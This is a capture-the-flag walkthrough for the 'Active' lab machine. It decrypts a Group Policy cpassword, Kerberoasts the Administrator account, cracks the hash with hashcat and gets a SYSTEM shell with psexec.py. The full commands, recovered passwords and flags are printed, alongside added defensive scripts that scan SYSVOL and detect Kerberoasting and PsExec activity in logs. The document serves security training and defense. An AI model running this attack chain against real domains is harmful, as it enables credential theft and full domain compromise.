This is an easy Windows box.
Tools used
- cat
- crackmapexec
- getuserspns
- gpp-decrypt
- hashcat
- mkdir
- mount
- nmap
- ntpdate
- psexec
- smbclient
- smbmap
Reconnaissance
Nmap
nmap -sC -sV -oA active 10.10.10.100 -v
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-02 08:07:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-08-02T08:07:58
|_ start_date: 2020-08-02T08:05:58
Here’s what nmap teaches us :
- port 53 (DNS) - Microsoft DNS 6.1.7601 - Windows Server 2008 R2 SP1
- port 88 (KERBEROS)
- port 139 (NETBIOS)
- port 389 (LDAP) - Domain: active.htb
- port 445 (SMB)
Nmap gives me the domain name, so I add it to /etc/hosts :
10.10.10.100 active.htb
Let’s first play with the SMB port :
smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
I have “READ ONLY” access to the “Replication” share, so let’s connect to it :
smbclient //10.10.10.100/Replication
Enter WORKGROUP\liodeus's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
10459647 blocks of size 4096. 4922511 blocks available
Download everything :
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (7.4 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (10.4 KiloBytes/sec) (average 3.3 KiloBytes/sec)
The one file I’m interested in is Groups.xml, as it may contain encrypted passwords :
cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Nice, I now have a username and an encrypted password. The cpassword value is AES-encrypted with a key Microsoft itself published (see MS14-025), so there is a tool called gpp-decrypt that decrypts it :
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
So I now have credentials :
username = SVC_TGS
password = GPPstillStandingStrong2k18
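The defensive counterpart of the step above is finding every cpassword still sitting in SYSVOL before someone else does. The following scanner is an added example, not a tool from this write-up: it walks a downloaded copy of the Replication/SYSVOL tree, parses each Group Policy Preferences XML file and reports every element that carries a non-empty cpassword attribute. It does not decrypt anything (gpp-decrypt already covers that); the embedded sample is the Groups.xml retrieved above, and the list of preference file names is the one from Microsoft's MS14-025 advisory.

```python
"""
Find stored Group Policy Preferences credentials (cpassword) in a copy of
SYSVOL. Added example for this write-up, not a tool the post uses: it walks
the downloaded Replication/SYSVOL tree, parses each GPP XML file and reports
every element that carries a cpassword attribute.
"""
import os
import sys
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword attribute. Groups.xml is
# the one on the box; the others are the remaining preference types listed
# in Microsoft's MS14-025 advisory.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample: the Groups.xml pulled from the Replication share in the
# write-up, embedded so the example runs offline.
SAMPLE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" '
    'image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">'
    '<Properties action="U" newName="" fullName="" description="" '
    'cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" '
    'changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" '
    'userName="active.htb\\SVC_TGS"/></User>\n</Groups>\n'
)


def find_cpasswords(xml_data, source="<string>"):
    """Return one finding per element carrying a non-empty cpassword attribute."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    root = ET.fromstring(xml_data)
    # ElementTree has no parent links; build a child -> parent map once so the
    # account name and 'changed' timestamp on the enclosing element are reachable.
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if not cpassword:            # absent or empty: no stored credential
            continue
        parent = parent_of.get(elem)
        account = (elem.get("userName") or elem.get("runAs") or elem.get("accountName")
                   or (parent.get("name") if parent is not None else ""))
        findings.append({
            "file": source,
            "element": parent.tag if parent is not None else elem.tag,
            "account": account,
            "changed": parent.get("changed") if parent is not None else None,
            "cpassword": cpassword,
        })
    return findings


def scan_tree(root_dir):
    """Walk a SYSVOL copy and collect cpassword findings from every GPP file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                try:
                    findings.extend(find_cpasswords(fh.read(), path))
                except ET.ParseError as exc:
                    print(f"[!] {path}: not parsable XML ({exc})", file=sys.stderr)
    return findings


if __name__ == "__main__":
    # Usage: python gpp_cpassword_scan.py /path/to/downloaded/active.htb
    # Without an argument it runs on the embedded sample.
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:
        results = find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml")
    for f in results:
        print(f"[+] {f['file']}: <{f['element']}> account={f['account']} changed={f['changed']}")
        print(f"    cpassword={f['cpassword']}")
```

Run it against the directory mget created (active.htb/) and every policy that still carries a preference password shows up with the account it sets and the date it was last changed; the fix is to remove the password from the preference item and rotate the account.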
I used different tools to show more possibilities; here is how to enumerate the shares with crackmapexec :
crackmapexec smb 10.10.10.100 -u "SVC_TGS" -p GPPstillStandingStrong2k18 --shares
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
With this account I have “READ” access to more shares.
Exploit
The share I’m interested in is “Users”. I’ll mount it; first, create a directory :
mkdir /tmp/Users
Then mount the share in this directory :
sudo mount -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' -t cifs //10.10.10.100/Users /tmp/Users
I can now go see what’s in there :
➜ /tmp ls Users
Administrator 'All Users' Default 'Default User' desktop.ini Public SVC_TGS
➜ /tmp ls Users/SVC_TGS
Contacts Desktop Downloads Favorites Links 'My Documents' 'My Music' 'My Pictures' 'My Videos' 'Saved Games' Searches
➜ /tmp ls Users/SVC_TGS/Desktop/
user.txt
On the desktop there is the user flag. I didn’t find anything interesting in the share and I can’t get a shell because I don’t have write access. I need to think of something else: I have valid credentials and port 88 (Kerberos) is open, so I can try an attack called Kerberoasting. Any domain user can request a service ticket for an account that has an SPN, and that ticket is encrypted with the service account’s password hash, so it can be cracked offline :
GetUserSPNs.py -dc-ip 10.10.10.100 -request active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2018-07-30 19:17:40.656520
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
I need to synchronize my clock with the box: Kerberos rejects requests whose timestamp is more than 5 minutes (the default tolerance) off the KDC’s clock, and nmap already reported a skew of 6m57s.
sudo ntpdate active.htb
3 Aug 13:51:48 ntpdate[45120]: step time server 10.10.10.100 offset +421.660606 sec
Re-run it :
GetUserSPNs.py -dc-ip 10.10.10.100 -request active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2018-07-30 19:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$962a7c86f5709dbf9433c5e8c445a498$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
It gives me a hash that hashcat can understand (mode 13100, Kerberos 5 TGS-REP etype 23), so let’s crack it with hashcat :
hashcat.exe -m 13100 hash.txt rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$962a7c86f5709dbf9433c5e8c445a498$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:Ticketmaster1968
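From the domain controller’s side, the ticket request that produced the hash above is not invisible. The `$krb5tgs$23$` prefix means the TGS was issued with RC4-HMAC (etype 23, logged as TicketEncryptionType 0x17), and a DC records every TGS request as Security event 4769. The script below is an added example, not part of this write-up: it reads 4769 records as JSON lines, keeps only successfully issued RC4 tickets for accounts that are neither computer accounts nor krbtgt, and groups them by requesting user. The sample events are constructed (field names as Windows writes them in EventData; the IP addresses and the svc_sql account are invented), not telemetry from the box.

```python
"""
Pick out Kerberoasting-style service-ticket requests from Windows Security
event 4769 records. Added example, not part of the write-up: RC4 (etype
0x17) service tickets for user accounts that own an SPN are the signal.
"""
import json
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType for etype 23 (what $krb5tgs$23$ means)

# Constructed sample 4769 events as JSON lines (EventData field names as
# Windows writes them); not telemetry captured from the box. The last line is
# a 4768 (TGT request) and must be ignored; the second line is a rejected
# request (non-zero Status) and must be ignored too.
SAMPLE_LOG = """\
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "Status": "0x12", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.10.20"}
{"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.10.20"}
{"EventID": 4768, "TargetUserName": "jdoe", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.10.20"}
"""


def parse_events(text):
    """Parse JSON-lines event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_roast_candidate(ev):
    """True for an issued RC4 service ticket for a non-computer, non-krbtgt account."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    if str(ev.get("TicketEncryptionType", "")).lower() != RC4_HMAC:
        return False
    service = ev.get("ServiceName", "")
    # Computer accounts end in '$'; krbtgt tickets are TGTs, not SPN tickets.
    return not service.endswith("$") and service.lower() != "krbtgt"


def summarize(events):
    """Map each requesting account to the sorted list of services it pulled RC4 tickets for."""
    per_requester = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            per_requester[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(services) for user, services in per_requester.items()}


if __name__ == "__main__":
    for user, services in summarize(parse_events(SAMPLE_LOG)).items():
        print(f"[!] {user} requested RC4 service tickets for: {', '.join(services)}")
```

One account pulling RC4 tickets for several SPN-bearing users in a short window is the pattern GetUserSPNs.py -request produces. The durable fix on the DC side is the one the cracked password makes obvious: a long, random password on every account that holds an SPN, and AES-only Kerberos for those accounts so etype 23 tickets are never issued for them.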
It didn’t take long before hashcat found the password. Let’s now get a shell as the Administrator user :
psexec.py Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file XPONPhQc.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service sqBi on 10.10.10.100.....
[*] Starting service sqBi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
And voilà, nt authority\system. I can now read the root flag!
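The psexec.py output above also shows what this access looks like in the target’s own logs: a file with a random eight-letter name (XPONPhQc.exe) lands in ADMIN$ (which maps to the Windows directory) and a service with a random four-letter name (sqBi) is created to run it. Every service install is recorded as System event 7045, so those two naming patterns make a usable heuristic. The script below is an added example, not part of this write-up; the regexes are derived from the names shown above, and the sample 7045 records are constructed (the MsSense and svchost lines are ordinary installs included as negatives).

```python
"""
Spot PsExec-style remote service installs in Windows System event 7045
records. Added example, not part of the write-up: the heuristic is a 7045
whose ServiceName is four letters and whose ImagePath is an eight-letter
.exe sitting directly in the Windows directory.
"""
import json
import re

# Heuristic patterns derived from the names psexec.py produced above
# (service "sqBi", binary "XPONPhQc.exe" uploaded to ADMIN$).
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY_IN_SYSTEMROOT = re.compile(
    r"^(?:%SystemRoot%|[A-Za-z]:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)

# Constructed sample 7045 events as JSON lines (EventData field names as the
# Service Control Manager writes them); not telemetry captured from the box.
SAMPLE_LOG = r"""
{"EventID": 7045, "ServiceName": "sqBi", "ImagePath": "%SystemRoot%\\XPONPhQc.exe", "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"}
{"EventID": 7045, "ServiceName": "Sense", "ImagePath": "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\"", "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7045, "ServiceName": "abcd", "ImagePath": "C:\\Windows\\system32\\svchost.exe -k netsvcs", "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7036, "ServiceName": "sqBi", "ImagePath": "", "ServiceType": "", "StartType": "", "AccountName": ""}
"""


def parse_events(text):
    """Parse JSON-lines event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_psexec_style(ev):
    """True when a 7045 carries both random-name indicators."""
    if ev.get("EventID") != 7045:
        return False
    name_hit = RANDOM_SERVICE_NAME.match(ev.get("ServiceName", "")) is not None
    path_hit = RANDOM_BINARY_IN_SYSTEMROOT.match(ev.get("ImagePath", "")) is not None
    return name_hit and path_hit


def find_psexec_services(events):
    """Return the 7045 records that look like a PsExec-style service install."""
    return [ev for ev in events if is_psexec_style(ev)]


if __name__ == "__main__":
    for ev in find_psexec_services(parse_events(SAMPLE_LOG)):
        print(f"[!] service {ev['ServiceName']} installed to run {ev['ImagePath']} "
              f"as {ev['AccountName']}")
```

Both indicators are required so that a legitimately short service name on its own (the abcd/svchost line) does not fire; the 7045 event pairs naturally with a 5145 share-access record for ADMIN$ from the same source host if you want a second corroborating signal.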
Flags
User.txt
cat /tmp/Users/SVC_TGS/Desktop/user.txt
86d67d8ba232bb6a254aa4d10159e983
Root.txt
C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b